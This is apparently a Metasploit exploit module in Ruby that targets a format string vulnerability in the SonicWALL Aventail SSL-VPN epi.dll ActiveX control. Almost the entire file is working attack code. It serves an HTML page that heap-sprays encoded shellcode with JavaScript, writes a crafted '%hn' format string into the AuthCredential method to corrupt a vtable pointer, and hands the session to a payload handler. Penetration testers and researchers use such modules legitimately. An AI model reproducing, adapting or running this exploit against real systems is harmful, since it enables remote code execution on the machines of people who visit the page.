Path: blob/master/modules/exploits/windows/browser/aventail_epi_activex.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking # heap spray and address shifty78include Msf::Exploit::Remote::HttpServer::HTML910def initialize(info = {})11super(12update_info(13info,14'Name' => 'SonicWALL Aventail epi.dll AuthCredential Format String',15'Description' => %q{16This module exploits a format string vulnerability within version 10.0.4.x and1710.5.1 of the SonicWALL Aventail SSL-VPN Endpoint Interrogator/Installer ActiveX18control (epi.dll). By calling the 'AuthCredential' method with a specially19crafted Unicode format string, an attacker can cause memory corruption and20execute arbitrary code.2122Unfortunately, it does not appear to be possible to indirectly re-use existing23stack data for more reliable exploitation. This is due to several particulars24about this vulnerability. First, the format string must be a Unicode string,25which uses two bytes per character. Second, the buffer is allocated on the26stack using the 'alloca' function. As such, each additional format specifier (%x)27will add four more bytes to the size allocated. This results in the inability to28move the read pointer outside of the buffer.2930Further testing showed that using specifiers that pop more than four bytes does31not help. Any number of format specifiers will result in accessing the same value32within the buffer.3334NOTE: It may be possible to leverage the vulnerability to leak memory contents.35However, that has not been fully investigated at this time.36},37'License' => MSF_LICENSE,38'Author' => [39'Nikolas Sotiriu', # original discovery / poc40'jduck' # Metasploit module41],42'References' => [43[ 'OSVDB', '67286'],44[ 'URL', 'http://sotiriu.de/adv/NSOADV-2010-005.txt' ]45],46'DefaultOptions' => {47'EXITFUNC' => 'process',48'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',49},50'Payload' => {51'Space' => 1024,52'BadChars' => "\x00",53'StackAdjustment' => -3500,54},55'Platform' => 'win',56'Targets' => [57[58'epi.dll v10.0.4.18 on Windows XP SP3',59{60# NOTE: Unfortunately, this address varies from execution to execution61'Write' => 0x1240000 + 0x501d4 + 2, # smashed high 16-bits of a vtable ptr :)62# 0x1d5005c, # crashes on deref+call63'Ret' => 0x0404040464}65]66],67'DisclosureDate' => '2010-08-19',68'DefaultTarget' => 0,69'Notes' => {70'Reliability' => UNKNOWN_RELIABILITY,71'Stability' => UNKNOWN_STABILITY,72'SideEffects' => UNKNOWN_SIDE_EFFECTS73}74)75)76end7778def autofilter79false80end8182def check_dependencies83use_zlib84end8586def on_request_uri(cli, request)87clsid = "2A1BE1E7-C550-4D67-A553-7F2D3A39233D"88progid = "Aventail.EPInterrogator.10.0.4.018"8990method = "AuthCredential"9192# Re-generate the payload93return if ((p = regenerate_payload(cli)) == nil)9495# Encode the shellcode96shellcode = Rex::Text.to_unescape(p.encoded, Rex::Arch.endian(target.arch))9798# Setup exploit buffers99nops = Rex::Text.to_unescape([target.ret].pack('V'))100write = Rex::Text.to_unescape([target['Write']].pack('V'))101102# Setup format string offset103printed = 0xb1 - 5104ret = (target.ret >> 16) - printed105106# Setup heap spray107blocksize = 0x40000108fillto = 300109110# Randomize the javascript variable names111axobj = "axobj" # rand_text_alpha(rand(100) + 1)112j_format = "fmt" # rand_text_alpha(rand(100) + 1)113j_counter = "i" # rand_text_alpha(rand(30) + 2)114# heap spray vars115j_shellcode = rand_text_alpha(rand(100) + 1)116j_nops = rand_text_alpha(rand(100) + 1)117j_ret = rand_text_alpha(rand(100) + 1)118j_headersize = rand_text_alpha(rand(100) + 1)119j_slackspace = rand_text_alpha(rand(100) + 1)120j_fillblock = rand_text_alpha(rand(100) + 1)121j_block = rand_text_alpha(rand(100) + 1)122j_memory = rand_text_alpha(rand(100) + 1)123124# NOTE: the second assignment triggers the shellcode125content = %Q|<html>126<object classid='clsid:#{clsid}' id='#{axobj}'></object>127<script>128#{j_shellcode}=unescape('#{shellcode}');129#{j_nops}=unescape('#{nops}');130#{j_headersize}=20;131#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;132while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};133#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});134#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});135while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};136#{j_memory}=new Array();137for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};138139#{j_format} = unescape("#{write}");140#{j_format} += '%#{ret}x';141for (#{j_counter} = 0; #{j_counter} < 22; #{j_counter}++)142#{j_format} += '%x';143#{j_format} += '%hn';144145#{axobj}.#{method} = #{j_format};146#{axobj}.#{method} = #{j_format};147</script>148</html>|149150print_status("Sending #{self.name}")151152# Transmit the response to the client153send_response_html(cli, content)154155# Handle the payload156handler(cli)157end158end159160161